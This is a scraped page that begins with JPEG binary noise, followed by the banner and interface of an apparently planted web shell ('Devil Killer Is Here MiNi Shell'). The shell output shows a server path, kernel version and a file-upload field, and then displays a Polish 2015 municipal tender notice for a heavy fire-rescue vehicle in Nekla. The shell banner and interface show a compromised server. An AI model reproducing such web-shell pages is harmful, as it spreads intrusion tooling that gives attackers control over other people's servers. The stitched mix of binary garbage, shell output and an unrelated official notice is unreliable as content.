JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150409/79376-N-2015.html

<p class="kh_header"><b>Nekla: Zakup fabrycznie nowego ciężkiego samochodu ratowniczo - gaśniczego typu GCBA z napędem 4x4 z wyposażeniem zamontowanym na stałe oraz mobilnym na wyposażenie jednostki Ochotniczej Straży Pożarnej w Nekli</b><br>
<b>Numer ogłoszenia: 79376 - 2015; data zamieszczenia: 09.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nekla , ul. Dworcowa 10, 62-330 Nekla, woj. wielkopolskie, tel. 061 4386011, faks 061 4386490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nekla.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup fabrycznie nowego ciężkiego samochodu ratowniczo - gaśniczego typu GCBA z napędem 4x4 z wyposażeniem zamontowanym na stałe oraz mobilnym na wyposażenie jednostki Ochotniczej Straży Pożarnej w Nekli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup fabrycznie nowego ciężkiego samochodu ratowniczo - gaśniczego typu GCBA z napędem 4x4 z wyposażeniem zamontowanym na stałe
1.Przedmiotem zamówienia jest zakup 1 szt. ciężkiego samochodu ratowniczo - gaśniczego  typu GCBA, uterenowionego, z napędem 4x4, z kabiną dla załogi 6 - osobowej, ze zbiornikiem wodnym i autopompą wraz z przeprowadzeniem szkolenia z zakresu obsługi sprzętu. 
2.Minimalne wymagania techniczne:
a.podwozie samochodu kategorii drugiej, (uterenowiony) z napędem 4x4:
- z blokadami mechanizmów różnicowych osi przedniej i tylnej oraz mechanizmu różnicowego międzyosiowego. 
- możliwość odłączenia napędu osi przedniej. 
- skrzynia biegów manualna. 
- kabina załogowa 6-osobowa. 
- maksymalna masa rzeczywista samochodu gotowego do akcji nie może przekroczyć 18 000 kg.
b.pojazd wyposażony w urządzenie sygnalizacyjno-ostrzegawcze, akustyczne i świetlne oraz głośnik. Urządzenie akustyczne powinno umożliwiać podawanie komunikatów słownych. Sterowanie modulacją dźwiękową musi odbywać się zarówno poprzez manipulator urządzenia i włącznik sygnału dźwiękowego pojazdu. Belka sygnalizacyjna ze światłem niebieskim LED na dachu kabiny i jedna lampa niebieska (stroboskopowa lub LED) z tyłu w górnej części zabudowy - zabezpieczone przed przypadkowym uszkodzeniem. Pojazd wyposażony w dodatkowy sygnał pneumatyczny, włączany włącznikiem umieszczonym w kabinie w miejscu łatwo dostępnym dla kierowcy i dowódcy.
c.podwozie samochodu z silnikiem o zapłonie samoczynnym, o mocy min. 340 KM, spełniającym normę Euro 6, przystosowanym do spalania biopaliw ciekłych zgodnie z uchwałą nr 134/2007 Rady Ministrów z dnia 24 lipca 2007 r. w sprawie Wieloletniego programu promocji biopaliw lub innych paliw odnawialnych w latach 2008-2014 (M.P. z 2007 r. Nr 53, poz. 607). W instrukcji użytkowania samochodu muszą znaleźć się zapisy o warunkach technicznych oraz czynnościach obsługowych koniecznych przy zasilaniu silnika biopaliwami lub paliwami z biokomponentami. Gwarancja na pojazd nie może wyłączać stosowania ww. paliwa!
d.maksymalna wysokość całkowita pojazdu nie może przekroczyć 3350 mm, jest to wysokość po zamontowaniu wszystkich elementów wyposażenia dodatkowego, łącznie z uchwytem drabiny i drabiną DW-10.
e.kabina czterodrzwiowa, jednomodułowa, zawieszona na poduszkach pneumatycznych z systemem samopoziomującym, zapewniająca dostęp do silnika, w układzie miejsc 1+1+4, siedzenia przodem do kierunku jazdy.
f.kolorystyka:
- nadwozie - RAL 3000,
- błotniki i zderzaki - w kolorze białym,
- drzwi żaluzjowe - w kolorze naturalnym aluminium,
- podwozie - w kolorze czarnym lub ciemno szarym. 
g.pojazd wyposażony w urządzenie (zaczep holowniczy) umożliwiający odholowanie pojazdu. Urządzenie  powinno mieć taką wytrzymałość, aby umożliwić holowanie po drodze pojazdu obciążonego masą całkowitą maksymalną oraz wytrzymywać siłę zarówno ciągnącą, jak i ściskającą.
h.pojazd powinien posiadać oświetlenie pola pracy wokół samochodu zapewniające oświetlenie w warunkach słabej widoczności oraz oświetlenie powierzchni dachu roboczego.
i.zbiornik wody o pojemności min. 5 m3, jednak nie większej niż 6 m3 (błąd pomiaru ? 1%), wykonany z materiałów kompozytowych. Zbiornik musi być wyposażony w oprzyrządowanie umożliwiające jego bezpieczną eksploatację, z układem zabezpieczającym przed wypływem wody w czasie jazdy. Zbiornik powinien być wyposażony w falochrony i posiadać właz rewizyjny.
j.zbiornik środka pianotwórczego o pojemności min. 10% pojemności zbiornika wody (min. 500 l jednak nie większej niż 600 l). Zbiornik musi być wyposażony w oprzyrządowanie zapewniające jego bezpieczną eksploatację. W górnej części powinien znajdować się zamykany wlew do grawitacyjnego napełnienia zbiornika z dachu pojazdu. Napełnianie zbiornika środkiem pianotwórczym powinno być możliwe także z poziomu terenu.
k.autopompa pożarnicza dwuzakresowa o wydajności min. 4 000 dm3/min. przy ciśnieniu 0,8 MPa i głębokości ssania 1,5 m oraz dla wysokiego ciśnienia min. 400 dm3/min przy ciśnieniu 4 MPa.
l.działko wodno-pianowe DWP32 o regulowanej wydajności umieszczone na dachu zabudowy pojazdu. Przy podstawie działka powinien być zamontowany zawór odcinający, kulowy ręczny.
m.samochód musi być wyposażony w linię szybkiego natarcia o długości węża minimum 60 m na zwijadle, zakończoną prądownicą wodno-pianową o regulowanej wydajności od 75 do 150 dm3/min, do podawania środków gaśniczych prądem zwartym i rozproszonym, z napędem elektrycznym.
n.pojazd wyposażony w zraszacze o wydajności 50-100 dm3/min. przy ciśnieniu 8 bar zasilane autopompą. Dwa zraszacze zamontowane przed przednią osią, dwa zraszacze po bokach pojazdu. Zraszacze powinny być tak ustawione, aby pole zraszania obejmowało pas przed kabiną o szerokości min. 6 m oraz pasy po bokach pojazdu na całej jego długości. Instalacja powinna być wyposażona w zawory odcinające (jeden dla zraszaczy przed przednią osią, drugi dla zraszaczy bocznych) uruchomianie z kabiny kierowcy.
o.Dodatkowe wyposażenie pojazdu:
- wciągarka elektryczna o maksymalnej sile uciągu min. 50 kN, długości liny min. 30 m. Wciągarka powinna być zamontowana zgodnie z warunkami technicznymi producenta wciągarki i wytycznymi producenta podwozia. Sterowanie pracą wciągarki powinno być realizowane z pulpitu przewodowego. Wciągarka powinna zapewniać możliwość ręcznego rozwinięcia liny oraz posiadać pilot przewodowy.
- sześć uchwytów uniwersalnych do aparatów powietrznych różnych marek. Mocowanie aparatów przewożonych w części zabudowy musi być na stelażu umożliwiającym samodzielne zakładanie aparatów bez zdejmowania ich ze stelaża. Miejsce montażu uchwytów w kabinie i zabudowie do uzgodnienia z Zamawiającym w trakcie realizacji zamówienia. W przypadku umieszczenia uchwytów w kabinie w oparciach siedzeń ławki tylnej każdy aparat zwalniamy osobna dźwignią.
- sterowany za pomocą pilota przewodowego maszt oświetleniowy z lampami 
LED o mocy min. 330 W. Stopień ochrony masztu i reflektorów IP 55.
- w kabinie kierowcy podłączony radiotelefon analogowo-cyfrowy samochodowy oraz 4 szt. radiotelefonów analogowo-cyfrowych przenośnych wyposażone w ładowarki z funkcją rozładowania akumulatora bez odpinania od radiotelefonu i akumulatory tego samego producenta. Radiotelefon samochodowy i przenośne tego samego producenta. Jeżeli napięcie zasilające ładowarek jest inne niż występujące w pojeździe Zamawiający wymaga zastosowania odpowiedniej przetwornicy. Ponadto samochód wyposażony w instalację antenową na pasmo radiowe 148 MHz. Radiotelefon ma być zaprogramowany zgodnie z dostarczoną po podpisaniu umowy obsadą kanałową. 
p.wyposażenie ratownicze - ruchome.
3.Szczegółowe parametry techniczno-użytkowe pojazdu, które są wymagane przez Zamawiającego, zostały określone w załączniku nr 1 do SIWZ.
4.Zamówienie realizowane jest w ramach projektu pt. Wsparcie techniczne OSP w Gminie Nekla poprzez zakup samochodu ratowniczo-gaśniczego dla poprawy bezpieczeństwa środowiskowego i ekologicznego współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach: Priorytetu III Środowisko Przyrodnicze, Działania 3.6 Poprawa bezpieczeństwa środowiskowego i ekologicznego Schematu VI Zakupu sprzętu pecjalistycznego do zapobiegania i likwidacji skutków klęsk żywiołowych i poważnych awarii środowiskowych. Wsparcie techniczne krajowego systemu ratowniczo-gaśniczego Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013.
5.Oferowany pojazd musi spełniać wymagania:
a.polskich przepisów o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych zgodnie z ustawą Prawo o ruchu drogowym (j.t. Dz.U.2012.198.1137 ze zm.).
b.określonych w niniejszej Specyfikacji Istotnych Warunków Zamówienia parametrów technicznych.
c.urządzenia i podzespoły zamontowane w pojeździe muszą spełniać wymagania określone w odrębnych przepisach krajowych.
d.być fabrycznie nowy i opatrzony przez producenta rokiem produkcji 2015. 
e.posiadać, na dzień składania ofert, świadectwo dopuszczenia do użytkowania oferowanego samochodu, wydane zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz.U.2007.143.1002 z późn. zm.) oraz Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 27 kwietnia 2010 roku zmieniającym rozporządzenie w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz.U.2010.85.553). 
Świadectwo dopuszczenia musi potwierdzać parametry oferowanego pojazdu w zakresie parametrów objętych Rozporządzeniem MSWiA.
Wykonawca na dzień składania ofert, musi również posiadać świadectwa dopuszczenia CNBOP, na elementy pojazdu, na które przepisy prawa nakładają obowiązek posiadania ww. świadectw. 
f.posiadać, na dzień składania ofert, aktualne świadectwo homologacji wraz z opisem technicznym oferowanego podwozia potwierdzające parametry wymagane przez Zamawiającego. W przypadku, gdy przekroczone zostały warunki zabudowy określone przez producenta podwozia wymagane jest świadectwo homologacji typu pojazdu kompletnego oraz zgoda producenta podwozia na wykonanie zabudowy.
g.posiadać, na dzień składania ofert, dokument wystawiony przez producenta podwozia potwierdzający możliwość stosowania w oferowanym pojeździe biopaliw lub paliw z dodatkiem biokomponentów w ilości nie mniejszej niż 5%.
h.normy PN EN 1846-1 i PN EN 1846-2.
6.Odbiór pojazdu nastąpi w siedzibie Wykonawcy lub miejscu przez niego wskazanym na terytorium Rzeczypospolitej Polskiej. 
7.Zamawiający wymaga, aby okres gwarancji wynosił minimum odpowiednio 24 miesiące na pojazd i 12 miesięcy na wyposażenie. Zamawiający zastrzega, że ustawowa rękojmia na przedmiot umowy zostanie przedłużona na okres równy okresowi gwarancji jakości..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.10-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w wysokości 19 000,00 zł (słownie: dziewiętnaście tysięcy złoty 00/100).
2.	Wadium wnosi się przed upływem terminu składania ofert.
3.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a.	pieniądzu - na konto bankowe:
Bank Spółdzielczy w Kostrzynie o/ Nekla 
Nr 58 9075 0009 1100 0101 0012 1370 z dopiskiem dostawa samochodu ratowniczo-gaśniczego
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c.	gwarancjach bankowych;
d.	gwarancjach ubezpieczeniowych;
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
4.	Zamawiający prosi o dołączenie do oferty potwierdzenia dokonania przelewu.
5.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
6.	Wadium wnoszone w innej formie niż w pieniądzu Wykonawca, przed złożeniem oferty w Sekretariacie Urzędu Miasta i Gminy Nekla, musi dostarczyć w formie ORYGINAŁU na Stanowisko ds. Unii Europejskiej i Zamówień Publicznych pok. Nr 12 lub ORYGINAŁ w odrębnej kopercie dołączyć do koperty zawierającej ofertę przetargową Wykonawcy.
7.	W przypadku wadium wnoszonego w innej formie niż w pieniądzu, Wykonawca załączy do oferty kopię dokumentu. Z treści dokumentu (gwarancji, poręczenia) winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
8.	Oferta niezabezpieczona akceptowaną formą wadium spowoduje wykluczenie oferenta.
9.	Zgodnie z art. 46 ustawy Prawo zamówień publicznych, Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako 
najkorzystniejsza.
10.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
11.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
12.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
13.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
14.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki o której mowa w art. 87 ust 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
15.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca w ciągu ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną dostawę polegającą na dostawie samochodu ratowniczo-gaśniczego, której wartość wynosiła min. 700 000,00 zł brutto i załącza do oferty dowody, że zamówienie zostało wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru - załącznik 2 do siwz,
- wypełniony opis przedmiotu zamówienia w tabeli zatytułowanej Minimalne wymagania dla przedmiotu zamówienia (załącznik nr 1 do siwz),
- kopia poświadczona za zgodność z oryginałem aktualnego na dzień składania ofert świadectwa dopuszczenia CNBOP na oferowany pojazd potwierdzającego parametry w zakresie Rozporządzenia MSWiA,
- kopia, poświadczona za zgodność z oryginałem, świadectwa dopuszczenia CNBOP, na elementy pojazdu, na które przepisy prawa nakładają taki obowiązek posiadania ww. świadectw,
- kopia, poświadczona za zgodność z oryginałem, aktualnego świadectwa homologacji wraz z opisem technicznym oferowanego podwozia potwierdzające parametry wymagane przez Zamawiającego. W przypadku, gdy przekroczone zostały warunki zabudowy określone przez producenta podwozia wymagane jest świadectwo homologacji typu pojazdu kompletnego oraz zgoda producenta podwozia na wykonanie zabudowy.
- raporty z badań CNBOP potwierdzające parametry w zakresie Rozporządzenia MSWiA,
- dokument wystawiony przez producenta podwozia potwierdzający możliwość stosowania w oferowanym pojeździe biopaliw lub paliw z dodatkiem biokomponentów w ilości nie mniejszej niż 5%,
- aktualny wykaz Autoryzowanych Stacji Obsługi (ASO) przez producenta podwozia,
- aktualny wykaz Autoryzowanych Stacji Obsługi (ASO) przez producenta nadwozia,
- rysunki poglądowe i zdjęcia oferowanego pojazdu,
- dokument potwierdzający wniesienie wadium.</p>
